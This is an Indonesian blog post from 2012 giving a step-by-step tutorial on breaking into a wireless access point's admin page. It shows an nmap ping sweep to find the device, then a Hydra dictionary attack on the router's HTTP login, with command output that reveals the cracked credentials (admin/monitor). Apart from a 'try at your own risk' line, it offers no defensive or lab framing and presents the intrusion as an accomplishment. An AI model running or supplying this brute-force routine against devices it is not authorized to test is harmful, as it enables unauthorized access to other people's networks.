Monday, April 9, 2012

Hacking Acces Point With Hydra


Try This With Your Own Risk !!! 


Jaringan komputer adalah suatu himpunan interkoneksi sejumlah komputer autonomous. Dalam bahasa yang popular dapat dijelaskan bahwa jaringan komputer adalah umpulan beberapa komputer (dan perangkat lain seperti printer, hub, dan sebagainya) yang saling terhubung satu sama lain melalui media perantara. Media perantaa ini bisa berupa media kabel ataupun media tanpa kabel (nirkabel). Informasi berupa data akan mengalir dari satu komputer ke komputer lain sehingga masing-masing komputer yang terhubung tersebut bisa saling bertukar data atau berbagi perangkat keras.

Nah, saat ini perkembangan teknologi telah berkambang dengan pesat. Dan semakin terbukanya jaringan kita keluar denagn jaringan wireless dapat membuat jaringan kita lebih terancam.

Disini saya akan memberikan sedikit tutorial hacking password access point dengan Hydra.

Langkah pertama kita scanning dulu jaringan dengan menggunakan NMAP.

C:\Documents and Settings\serverdata>nmap -sP 192.168.1.1-255
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-18 13:22 Pacific Daylight Time
Nmap scan report for 192.168.1.1
Host is up (0.031s latency).
MAC Address: 94:0C:6D:FD:5B:46 (Unknown)
Nmap scan report for 192.168.1.6
Host is up (0.00s latency).
MAC Address: 00:27:19:1D:80:13 (Tp-link Technologies CO.)
Nmap scan report for 192.168.1.11
Host is up (0.00s latency).
MAC Address: 08:00:27:5B:32:BF (Cadmus Computer Systems)
Nmap scan report for 192.168.1.22
Host is up.
Nmap scan report for 192.168.1.39
Host is up (0.00s latency).
MAC Address: 08:00:27:18:E8:19 (Cadmus Computer Systems)
Nmap done: 255 IP addresses (5 hosts up) scanned in 23.39 seconds
C:\Documents and Settings\serverdata>

Dari Hasil scanning tersebut kita mendapatkan informasi IP-address 192.168.1.6 MAC-address TP-LINK, kita coba panggil dengan menggunakan browser.


Dan ternyata benar MAC tersebut adalah MAC address dari AP. Setelah kita mengetahui MAC-address maka kita tinggal melakukan hacking password menggunakan Hydra.

Namun sebelum menjalankan aksi siapkan terlebih dahulu file yang berisi kamus untuk attack dictionary. Untuk mendapatkan file tersebut kamu bias googling atau membuatnya sendiri. Setelah itu, maka kita dapat mencoba attack dengan Hydra.

H:\hydra>hydra -m / -l admin -P kamus.txt 192.168.1.6 http-get
Hydra v6.0 (c) 2011 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-18 13:35:07
[DATA] 7 tasks, 1 servers, 7 login tries (l:1/p:7), ~1 tries per task
[DATA] attacking service http-get on port 80
[STATUS] attack finished for 192.168.1.6 (waiting for childs to finish)
[80][www] host: 192.168.1.6 login: admin password: monitor
Hydra (http://www.thc.org) finished at 2011-10-18 13:35:08

And Binggo !!! Kita mendapatkan password access point tersebut, dan kita tinggal memasukkan password dan user name pada form login. User Name : admin Password : monitor , and taaraaaa....


No comments:

Post a Comment